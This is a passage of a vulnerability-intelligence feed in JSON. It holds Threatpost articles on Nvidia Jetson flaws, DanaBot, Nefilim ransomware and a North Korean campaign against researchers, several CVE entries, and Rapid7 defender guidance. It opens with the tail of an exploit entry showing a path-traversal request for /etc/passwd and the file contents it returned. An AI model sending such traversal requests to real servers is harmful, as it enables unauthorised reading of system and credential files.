\"http://192.168.1.17/archive//download/%2Fetc%2Fpasswd\"\r\n\r\nroot:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\r\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\r\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\r\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\r\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\r\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\r\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\r\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\r\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\r\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\r\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\r\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\r\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\r\nlibuuid:x:100:101::/var/lib/libuuid:\r\nsyslog:x:101:104::/home/syslog:/bin/false\r\nmysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false\r\nprovision:x:999:107::/srv/provision/provision:/bin/bash\r\nstvs:x:1000:100::/home/stvs:/bin/bash\r\nusbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false\r\nntp:x:104:108::/home/ntp:/bin/false\r\nmessagebus:x:105:110::/var/run/dbus:/bin/false\r\nsshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin\r\nstatd:x:107:65534::/var/lib/nfs:/bin/false\r\n\r\n\r\n--\r\nErrno::ENOENT No such file or directory - /var/www/index.html:\r\n\r\n /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'\r\n /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'\r\n /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49481"}], "threatpost": [{"lastseen": "2021-01-26T22:25:26", "bulletinFamily": "info", "cvelist": ["CVE-2021-1052", "CVE-2021-1053", "CVE-2021-1056", "CVE-2021-1070"], "description": "Nvidia has patched three vulnerabilities affecting its Jetson lineup, which is a series of embedded computing boards designed for machine-learning applications, in things like autonomous robots, drones and more. A successful exploit could potentially cripple any such gadgets leveraging the affected Jetson products, said Nvidia.\n\nIf exploited,[ the most serious of these flaws](<https://nvidia.custhelp.com/app/answers/detail/a_id/5147>) could lead to a denial-of-service (DoS) condition for affected products. The flaw ([CVE-2021-1070](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1070>)) ranks 7.1 out of 10 on the CVSS scale, making it high-severity. It specifically exists in the Nvidia Linux Driver Package (L4T), the board support package for Jetson products.\n\nNvidia L4T contains a glitch in the apply_binaries.sh script. This script is used to install Nvidia components into the root file system image. The script allows improper access control, which may lead to an unprivileged user being able to modify system device tree files. Device trees are a data structure of the hardware components of a particular computer, which allow an operating system\u2019s kernel to use and manage those components, including the CPU, memory, and peripherals.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAccess to a device tree file could allow an attacker to launch a DoS attack. Further details about the flaw \u2013 including what an attacker needs to exploit it \u2013 were not disclosed. The issue was discovered by programmer Michael de Gans.\n\nAll versions prior to L4T release r32.5 are affected; a patch is available in L4T release r32.5. Specific Jetson products affected include the Jetson TX1 and TX2 series; which are two low-power embedded computing boards that carry a Nvidia Tegra processor and are specifically designed for accelerating machine learning in systems. Also affected are the Jetson AGX Xavier series, a developer kit that\u2019s essentially an artificial intelligence computer for autonomous machines; the Jetson Xavier NX developer kit; and the Jetson Nano and Jetson Nano 2GB developer kits.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/01/26155553/Teal2-300x178-1.jpg>)\n\nA drone with Nvidia Jetson TX1\n\nThe other two are medium-severity flaws (CVE\u20112021\u20111069 and CVE\u20112021\u20111071), which were uncovered in the Nvidia Tegra\u2019s kernel driver. This is code that allows the kernel to talk to the hardware devices that the system-on-a-chip (SoC) is in.\n\nCVE\u20112021\u20111069 exists in NVHost, a software host that\u2019s part of Nvidia Driver Helper Service. NVHost allows a variable to be null, which may lead to a null pointer dereference and unexpected reboot, ultimately leading to data loss, according to Nvidia.\n\nCVE\u20112021\u20111071 meanwhile exists in the INA3221 driver, an on-board power monitor that monitors the voltage and current of certain rails. The flaw enables improper access control, which may lead to unauthorized users gaining access to system power usage data. This can lead to information disclosure.\n\nIt\u2019s only the latest set of patches to be released by Nvidia this month. Last week, Nvidia newly disclosed [three security vulnerabilities](<https://threatpost.com/nvidia-gamers-dos-data-loss-shield-tv-bugs/163200/>) in the NVIDIA Shield TV, which could allow denial of service, escalation of privileges and data loss. Earlier in January, Nvidia patched flaws [tied to 16 CVEs](<https://threatpost.com/nvidia-windows-gamers-graphics-driver-flaws/162857/>) across its graphics drivers and vGPU software, in its first security update of 2021. An updated security advisory now includes the availability of patched Linux drivers for the Tesla line of GPUs, affecting CVE-2021-1052, CVE-2021-1053 and CVE-2021-1056.\n", "modified": "2021-01-26T22:11:54", "published": "2021-01-26T22:11:54", "id": "THREATPOST:999241D3734A4194DA7DD62BB1C2B5E2", "href": "https://threatpost.com/nvidia-squashes-high-severity-jetson-dos-flaw/163360/", "type": "threatpost", "title": "Nvidia Squashes High-Severity Jetson DoS Flaw", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-27T12:19:11", "bulletinFamily": "info", "cvelist": [], "description": "Researchers are warning that a new fourth version of the DanaBot banking trojan has surfaced after months of mysteriously going quiet. The latest variant, still under analysis by researchers, is raising concerns given the number of past DanaBot effective campaigns.\n\nFrom [May 2018](<https://threatpost.com/threatlist-ransomware-trojans-picking-up-steam-in-2019/145718/>) to June 2020, DanaBot has been a fixture in the crimeware threat landscape, according to Proofpoint, which first discovered the malware in 2018 and posted a debrief on the latest variant Tuesday. \n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cStarting in late October 2020, we observed a significant update to DanaBot samples appearing in VirusTotal,\u201d wrote Dennis Schwarz, Axel F. and Brandon Murphy, [in the collaborative Tuesday report](<https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot>). \u201cWhile it has not returned to its former scale, DanaBot is malware that defenders should put back on their radar.\u201d\n\n## **DanaBot the Destructor**\n\nDanaBot is a banking trojan that first targeted users in Australia via emails containing malicious URLs. Criminals then developed a second variant and targeted US companies \u2013 part of a series of large-scale campaigns. A third variant surfaced in February 2019 that was significantly enhanced with remote command-and-control functionality, according to the [ESET researchers who discovered](<https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/>) it.\n\nWhile the most recent fourth version, found by Proofpoint, is unique, it\u2019s unclear from the researcher\u2019s recent report what specific new capabilities, if any, the malware has today. Proofpoint did not reply to press inquiries.\n\nCompared to [previous campaigns, ](<https://threatpost.com/threatlist-biggest-cybercrime-developments-in-2018-so-far/133041/>) the Tuesday report suggests that this most recent variant comes packed mostly with the same deadly arsenal of tools that have come before. Main features include a ToR component to anonymize communications between the bad-guys and an infected hardware.\n\n**\u201c**As previously reported in DanaBot control panel revealed, we believe DanaBot is set up as a \u2018malware as a service\u2019 in which one threat actor controls a global command and control (C&amp;C) panel and infrastructure then sells access to other threat actors known as affiliates,\u201d researchers wrote.\n\n## **At the DanaBot Core **\n\nIn general, DanaBot\u2019s multi-stage infection chain starts with a dropper that triggers a cascading evolution of hacks. These include stealing network requests, siphoning off application and service credentials, data exfiltration of sensitive information, [ransomware infection,](<https://threatpost.com/danabot-ransomware-arsenal/145863/>) desktop screenshot spying and the dropping of a cryptominer to turn targeted PCs into cryptocurrency worker bees.\n\nWith its current analysis, Proofpoint focused on the specific technical changes within the malware\u2019s \u201cMain component.\u201d That facet of the malware included anti-analysis features along with:\n\n * Some Windows API functions are resolved at run-time.\n * When a malware-related file is read or written to the filesystem, it is done in the middle of benign decoy file reads or writes.\n * Persistence is maintained by creating an LNK file that executes the main component in the user\u2019s Startup directory.\n\nLNK files (or Windows shortcut files) are files created by Windows automatically, whenever a user opens their files. These files are used by Windows for connecting a file type to a specific application used to view or edit digital content.\n\n## Incremental Updates Identified\n\nWith this new variant, researchers identified several new Affiliate IDs, suggesting that the malware-as-a-service component to DanaBot was very much active and growing. Also flagged were new tactics and techniques for infection.\n\n\u201cProofpoint researchers were able to narrow down at least one of the DanaBot distribution methods to various software warez and cracks websites that supposedly offer software keys and cracks for a free download, including anti-virus programs, VPNs, graphics editors, document editors, and games,\u201d researchers wrote.\n\nIllicit content or warez tools downloaded from these sites are identified as the initial infection points for this latest fourth variant. One site, promoting a software key generator, bait-and-switched users who thought they were downloading a program crack, but actually the warez file \u201ccontained several \u2018README\u2019 files and a password-protected archive containing the initial dropper for the malware bundle, \u2018setup_x86_x64_install.exe,'\u201d wrote Proofpoint.\n\n\u201cSome of the affiliates that were using [DanaBot] have continued their campaigns using other banking malware (e.g. Ursnif and Zloader). It is unclear whether COVID-19, competition from other banking malware, redevelopment time, or something else caused the dip, but it looks like DanaBot is back and trying to regain its foothold in the threat landscape,\u201d concluded researchers.\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "modified": "2021-01-26T21:24:34", "published": "2021-01-26T21:24:34", "id": "THREATPOST:FB1EECB1F41D44DAD3982F7DE0938281", "href": "https://threatpost.com/danabot-malware-roars-back/163358/", "type": "threatpost", "title": "DanaBot Malware Roars Back into Relevancy", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-26T22:23:18", "bulletinFamily": "info", "cvelist": ["CVE-2019-11634", "CVE-2019-13608", "CVE-2020-8269", "CVE-2020-8270", "CVE-2020-8283"], "description": "A Nefilim ransomware attack that locked up more than 100 systems stemmed from the compromise of an unmonitored account belonging to an employee who had died three months previously, researchers said.\n\nNefilim (a.k.a. Nemty) is a ransomware strain that emerged in 2020, with its operators adopting the tactic that researchers[ call double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>). In other words, Nefilim threatens to release victims\u2019 data to the public if they fail to pay the ransom; it has its own leaks site called Corporate Leaks, which resides on a TOR node. Most famously, it attacked Australian transportation giant [Toll Group](<https://threatpost.com/ransomware-attack-toll-group-systems-again/155505/>) early last year.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAccording to Sophos researcher Michael Heller, this latest victim was compromised by exploiting vulnerable versions of Citrix software, after which the gang gained access to an admin account. From there, it stole the credentials for a domain admin account using Mimikatz.\n\n## **Nefilim Lurks for a Month, Stealing Data**\n\nA Sophos forensic analysis found that the organization\u2019s installed Citrix Storefront 7.15 CU3 was vulnerable at time of incident to a known critical security bug ([CVE-2019-11634](<https://support.citrix.com/article/CTX251986>)) and four high-severity issues ([CVE-2019-13608](<https://support.citrix.com/article/CTX251988>), [CVE-2020-8269](<https://support.citrix.com/article/CTX285059>), [CVE-2020-8270](<https://support.citrix.com/article/CTX285059>), [CVE-2020-8283](<https://support.citrix.com/article/CTX285059>)). Storefront is an enterprise app store that employees can use to download approved applications.\n\nIt\u2019s almost certain, the team found, that this was the initial point of entry into the victim\u2019s network.\n\nAfter exploiting the Citrix installation and establishing an initial foothold, the attackers also used Remote Desktop Protocol (RDP) logins to maintain remote access to the initial admin account used in the attack.\n\nTo move laterally, the threat actor used Mimikatz, which allows attackers to enumerate and view the credentials stored on the system. Armed with that knowledge, they were then able to compromise a domain administrator account.\n\nDomain admin in Windows is a user account that can edit information in Active Directory. It can modify the configuration of Active Directory servers and can modify any content stored in Active Directory. This includes creating new users, deleting users, and changing their permissions. As such, it gives its controller a lot of power and visibility into the network.\n\n\u201cThe Rapid Response investigation then uncovered PowerShell commands as well as the use of RDP and Cobalt Strike to move laterally to multiple hosts, conduct reconnaissance and enumerate the network,\u201d Heller explained in a [Tuesday analysis](<https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/>). \u201cThe threat actor installed the file transfer and synchronization application MEGA in order to exfiltrate data; [and] the Nefilim ransomware binaries were deployed using Windows Management Instrumentation (WMI) via the compromised domain admin account.\u201d\n\nIn all, the Nefilim operators were inside the victim\u2019s network for about one month before launching the ransomware itself, Heller said, often carrying out activities in the middle of the night to avoid detection.\n\n\u201cThe attacker gained access to that admin account, then spent one month quietly moving around to steal credentials for a domain admin account, finding the trove of data they wanted, exfiltrating hundreds of GB of data, and then finally announcing their presence with the ransomware attack,\u201d he noted in a Tuesday posting.\n\n## **Ghost Account: A Failing of Best Security Practices**\n\nThe issue is that the administrative account that handed the cybercriminals the keys to the company\u2019s data kingdom belonged to someone who is no longer with the company \u2013 indeed who no longer walks the earth. These types of \u201cghost\u201d accounts present above-average risk to enterprises, researchers said, because of the lack of oversight in terms of how and when such accounts are used, given that there\u2019s no daily user to keep tabs on activity.\n\nSophos Rapid Response manager Peter Mackenzie told the customer that another type of attacker, a more stealthy one, could have lurked for months, stealing all sensitive information in the company\u2019s systems.\n\n\u201cIf they hadn\u2019t [deployed ransomware], how long would they have had domain admin access to the network without the customer knowing?\u201d\n\nThus, alerts for when domain admin accounts are created or used could potentially have prevented the attack. In a previous case, Sophos researchers saw an attacker gaining access to an organization\u2019s network, creating a new user, and adding that account to the domain admin group in Active Directory \u2013 but, no alerts were set off.\n\n\u201cThat new domain admin account went on to delete about 150 virtual servers and used Microsoft BitLocker to encrypt the server backups,\u201d Mackenzie said.\n\nBest practices would dictate taking such accounts out of commission completely, but the organization said it was kept active \u201cbecause there were services that it was used for.\u201d\n\n\u201cIf an organization really needs an account after someone has left the company, they should implement a service account and deny interactive logins to prevent any unwanted activity,\u201d Heller noted. \u201cOr, if they don\u2019t need the account for anything else, disable it and carry out regular audits of Active Directory. Active Directory Audit Policies can be set to monitor for admin account activity or if an account is added to the domain admin group.\u201d\n\nMackenzie said that in general, far fewer accounts need to be designated as domain admins than most people think.\n\n\u201cPeople assume because a person is an executive or is in charge of the network that they need to be using a domain admin account. \u200bThis isn\u2019t true and it\u2019s dangerous,\u201d he said. \u201cNo account with privileges should be used by default for work that doesn\u2019t require that level of access. Users should elevate to using the required accounts when needed and only for that task.\u201d\n\nBest practices to avoid attacks like this include only granting access permissions that are needed for a specific task or role; disabling accounts that are no longer needed; implementing a service account and denying interactive logins for any \u201cghost\u201d accounts; and carrying out regular audits of Active Directory to monitor for admin account activity or if an unexpected account is added to the domain admin group.\n\n\u201cRansomware will continue to plague organizations for the foreseeable future, so it\u2019s important that the root causes are looked at. In this case, the criminals were successful in their attack by being able to take over an orphan or ghost account which had administrative privileges,\u201d Javvad Malik, security awareness advocate at KnowBe4, said via email. \u201cAccount management, and in particular, privileged account management is an important security control for which all organizations should have processes in place.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "modified": "2021-01-26T17:15:33", "published": "2021-01-26T17:15:33", "id": "THREATPOST:053FEC7B80C38756963313717D636EA6", "href": "https://threatpost.com/nefilim-ransomware-ghost-account/163341/", "type": "threatpost", "title": "Nefilim Ransomware Gang Hits Jackpot with Ghost Account", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-26T16:35:34", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "Hackers linked to [North Korea](<https://threatpost.com/north-korea-spy-reporters-feds-warn/160622/>) are targeting security researchers with an elaborate social-engineering campaign that sets up trusted relationships with them \u2014 and then infects their organizations\u2019 systems with custom backdoor malware.\n\nThat\u2019s according to [Google\u2019s Threat Analysis Group (TAG),](<https://twitter.com/ShaneHuntley/status/1353856344655204352>) which issued a warning late Monday about a campaign it has tracked over the last several months that uses various means to interact with and attack professionals working on vulnerability research and development at multiple organizations.\n\nThe effort includes attackers going so far as to set up their own research blog, multiple Twitter profiles and other social-media accounts in order to look like legitimate security researchers themselves, according to a [blog post](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) by TAG\u2019s Adam Weidermann. Hackers first establish communications with researchers in a way that looks like they are credibly working on similar projects, then they ask them to collaborate, and eventually infect victims\u2019 machines.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe infections are propagated either through a malicious backdoor in a Visual Studio Project or via an infected website, he wrote. And moreover, those infected were running fully patched and up-to-date Windows 10 and Chrome browser versions \u2014 a signal that hackers likely are using zero-day vulnerabilities in the campaign, the researcher concluded.\n\nTAG attributed the threat actors to \u201ca government-backed entity based in North Korea.\u201d\n\n\u201cThey\u2019ve used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits, and for amplifying and retweeting posts from other accounts that they control,\u201d according to the post. \u201cTheir blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including \u2018guest\u2019 posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.\u201d\n\nIn addition to Twitter, threat actors also used other platforms, including LinkedIn, Telegram, [Discord](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>), Keybase and email to communicate with potential targets, Weidermann said. So far it seems that only security researchers working on Windows machines have been targeted.\n\n## **Making Connections**\n\nAttackers initiate contact by asking a researcher if he or she wants to collaborate on vulnerability research together. Threat actors appear to be credible researchers in their own right because they have already posted videos of exploits they\u2019ve worked on, including faking the success of a working exploit for an existing and recently patched [Windows Defender vulnerability](<https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/>), [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>), on YouTube.\n\nThe vulnerability received notoriety as one that has been exploited for the past three months and leveraged by hackers as part of the massive [SolarWinds attack](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>).\n\n\u201cIn the video, they purported to show a successful working exploit that spawns a cmd.exe shell, but a careful review of the video shows the exploit is fake,\u201d Weidermann explained.\n\nIf an unsuspecting targeted researcher agrees to collaborate, attackers then provide the researcher with a Visual Studio Project infected with malicious code. Several targets [took to Twitter](<https://twitter.com/search?q=blog.br0vvnn.io&src=typed_query>) to describe their experiences.\n\n> I got targeted by Zhang Guo and sent me the blog post link hxxps://blog.br0vvnn[.]io/pages/blogpost.aspx?id=1&amp;q=1 <https://t.co/QR5rUYDHrh>\n> \n> \u2014 lockedbyte (@lockedbyte) [January 26, 2021](<https://twitter.com/lockedbyte/status/1353995532180615174?ref_src=twsrc%5Etfw>)\n\n\u201cWithin the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events,\u201d Weidermann wrote. \u201cThe DLL is custom malware that would immediately begin communicating with actor-controlled command-and-control (C2) domains.\u201d\n\nVictims also can be infected by following a Twitter link hosted on blog.br0vvnn[.]io to visit a threat actor\u2019s blog, according to TAG. Accessing the link installs a malicious service on the researcher\u2019s system that executes an in-memory backdoor that establishes a connection to an actor-owned C2 server, researchers discovered.\n\nThe TAG team so far could not confirm the mechanism of compromise, asking for help from the greater security community to identify and submit information through the [Chrome Vulnerability Reward Program](<https://www.google.com/about/appsecurity/chrome-rewards/>).\n\nResearchers also did not specifically say what the likely motive was for the attacks; however, presumably the threat actors aim to uncover and steal vulnerabilities to use in North Korean advanced persistent threat (APT) campaigns.\n\nWeidermann\u2019s post includes a list of known accounts being used in the campaign, and he advised researchers who may have communicated with any of the accounts or visited related sites to review their systems for compromise.\n\n\u201cWe hope this post will remind those in the security research community that they are targets to government-backed attackers and should remain vigilant when engaging with individuals they have not previously interacted with,\u201d Weidermann wrote.\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "modified": "2021-01-26T14:49:03", "published": "2021-01-26T14:49:03", "id": "THREATPOST:FF67AF009F2F0031599099334F6CC306", "href": "https://threatpost.com/north-korea-security-researchers-0-day/163333/", "type": "threatpost", "title": "North Korea Targets Security Researchers in Elaborate 0-Day Campaign", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-01-27T12:33:30", "description": "Insider Threat Management Windows Agent Local Privilege Escalation Vulnerability The Proofpoint Insider Threat Management (formerly ObserveIT) Agent for Windows before 7.4.3, 7.5.4, 7.6.5, 7.7.5, 7.8.4, 7.9.3, 7.10.2, and 7.11.0.25 as well as versions 7.3 and earlier is missing authentication for a critical function, which allows a local authenticated Windows user to run arbitrary commands with the privileges of the Windows SYSTEM user. Agents for MacOS, Linux, and ITM Cloud are not affected.", "edition": 1, "cvss3": {}, "published": "2021-01-26T20:15:00", "title": "CVE-2021-22159", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-22159"], "modified": "2021-01-26T20:59:00", "cpe": [], "id": "CVE-2021-22159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22159", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-01-27T12:33:30", "description": "Go before 1.14.14 and 1.15.x before 1.15.7 on Windows is vulnerable to Command Injection and remote code execution when using the \"go get\" command to fetch modules that make use of cgo (for example, cgo can execute a gcc program from an untrusted download).", "edition": 1, "cvss3": {}, "published": "2021-01-26T18:16:00", "title": "CVE-2021-3115", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-3115"], "modified": "2021-01-26T21:00:00", "cpe": [], "id": "CVE-2021-3115", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3115", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-01-27T14:21:27", "description": "A local (authenticated) low-privileged user can exploit a behavior in an ESET installer to achieve arbitrary file overwrite (deletion) of any file via a symlink, due to insecure permissions. The possibility of exploiting this vulnerability is limited and can only take place during the installation phase of ESET products. Furthermore, exploitation can only succeed when Self-Defense is disabled. Affected products are: ESET NOD32 Antivirus, ESET Internet Security, ESET Smart Security, ESET Smart Security Premium versions 13.2 and lower; ESET Endpoint Antivirus, ESET Endpoint Security, ESET NOD32 Antivirus Business Edition, ESET Smart Security Business Edition versions 7.3 and lower; ESET File Security for Microsoft Windows Server, ESET Mail Security for Microsoft Exchange Server, ESET Mail Security for IBM Domino, ESET Security for Kerio, ESET Security for Microsoft SharePoint Server versions 7.2 and lower.", "edition": 1, "cvss3": {}, "published": "2021-01-26T18:15:00", "title": "CVE-2020-26941", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2020-26941"], "modified": "2021-01-26T20:59:00", "cpe": [], "id": "CVE-2020-26941", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-26941", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2021-01-27T14:21:27", "description": "An elevation of privilege vulnerability exists in Hackolade versions prior 4.2.0 on Windows has an issue in specific deployment scenarios that could allow local users to gain elevated privileges during an uninstall of the application.", "edition": 1, "cvss3": {}, "published": "2021-01-26T18:15:00", "title": "CVE-2020-25737", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2020-25737"], "modified": "2021-01-26T20:59:00", "cpe": [], "id": "CVE-2020-25737", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25737", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "rapid7blog": [{"lastseen": "2021-01-26T17:14:59", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "\n\n_This blog was co-authored by Caitlin Condon, VRM Security Research Manager, and Bob Rudis, Senior Director and Chief Security Data Scientist._\n\nOn Monday, Jan. 25, 2021, Google\u2019s Threat Analysis Group (TAG) [published a blog on a widespread social engineering campaign](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) that targeted security researchers working on vulnerability research and development. The campaign, which Google attributed to North Korean (DPRK) state-sponsored actors, has been active for several months and sought to compromise researchers using several methods.\n\nRapid7 is aware that many security researchers were targeted in this campaign, and information is still developing. While we currently have no evidence that we were compromised, we are continuing to investigate logs and examine our systems for any of the [IOCs listed in Google\u2019s analysis](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>). We will update this post with further information as it becomes available.\n\nOrganizations should take note that this was a highly sophisticated attack that was important enough to those who orchestrated it for them to burn an as-yet unknown exploit path on. This event is the latest in a chain of attacks\u2014e.g., those targeting SonicWall, VMware, Mimecast, Malwarebytes, Microsoft, Crowdstrike, and SolarWinds\u2014that demonstrates a significant increase in threat activity targeting cybersecurity firms with legitimately sophisticated campaigns. Scenarios like these should become standard components of tabletop exercises and active defense plans.\n\n## North Korean-attributed social engineering campaign\n\nGoogle discovered that the DPRK threat actors had built credibility by establishing a vulnerability research blog and several Twitter profiles to interact with potential targets. They published videos of their alleged exploits, including a YouTube video of a fake proof-of-concept (PoC) exploit for CVE-2021-1647\u2014a [high-profile Windows Defender zero-day vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647>) that garnered attention from both security researchers and the media. The DPRK actors also published \u201cguest\u201d research (likely plagiarized from other researchers) on their blog to further build their reputation.\n\nThe malicious actors then used two methods to social engineer targets into accepting malware or visiting a malicious website. [According to Google](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>):\n\n * After establishing initial communications, **the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project.** Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional pre-compiled library (DLL) that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled command and control (C2) domains.\nVisual Studio Build Events command executed when building the provided VS Project files. Image provided by Google.\n\n * In addition to targeting users via social engineering, Google also observed several cases where researchers have been compromised after visiting the actors\u2019 blog. In each of these cases, the researchers followed a link on Twitter to a write-up hosted on `blog[.]br0vvnn[.]io`, and shortly thereafter, a malicious service was installed on the researcher\u2019s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. **At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.** As of Jan. 26, 2021, Google was unable to confirm the mechanism of compromise.\n\nThe blog the DPRK threat actors used to execute this zero-day drive-by attack was posted on Reddit as long as three months ago. The actors also used a range of social media and communications platforms to interact with targets\u2014including Telegram, Keybase, Twitter, LinkedIn, and Discord. As of Jan. 26, 2021, many of these profiles have been suspended or deactivated.\n\n## Rapid7 customers\n\nGoogle\u2019s threat intelligence includes information on IOCs, command-and-control domains, actor-controlled social media accounts, and compromised domains used as part of the campaign. Rapid7's MDR team is deploying IOCs and behavior-based detections. These detections will also be available to InsightIDR customers later today. We will update this blog post with further information as it becomes available.\n\n## Defender guidance\n\nTAG noted in their blog post that **they have so far only seen actors targeting Windows systems.** As of the evening of Jan. 25, 2021, researchers across many companies [confirmed on Twitter](<https://twitter.com/richinseattle/status/1353864756109578241>) that they had interacted with the DPRK actors and/or visited the malicious blog. Organizations that believe their researchers or other employees may have been targeted should conduct internal investigations to determine whether indicators of compromise are present on their networks.\n\nAt a minimum, responders should:\n\n * Ensure members of all security teams are aware of this campaign and encourage individuals to report if they believe they were targeted by these actors.\n * Search web traffic, firewall, and DNS logs for evidence of contacts to the domains and URLs provided by Google in their post.\n * According to [Rapid7 Labs\u2019 forward DNS archive](<https://opendata.rapid7.com>), the `br0vvnn[.]io` apex domain has had two discovered fully qualified domain names (FQDNs)\u2014`api[.]br0vvnn[.]io` and `blog[.]br0vvnn[.]io`\u2014over the past four months with IP addresses `192[.]169[.]6[.]31` and `192[.]52[.]167[.]169`, respectively. Contacts to those IPs should also be investigated in historical access records.\n * Check for evidence of the provided hashes on all systems, starting with those operated and accessed by members of security teams.\n\nMoving forward, organizations and individuals should heed Google\u2019s advice that _\u201cif you are concerned that you are being 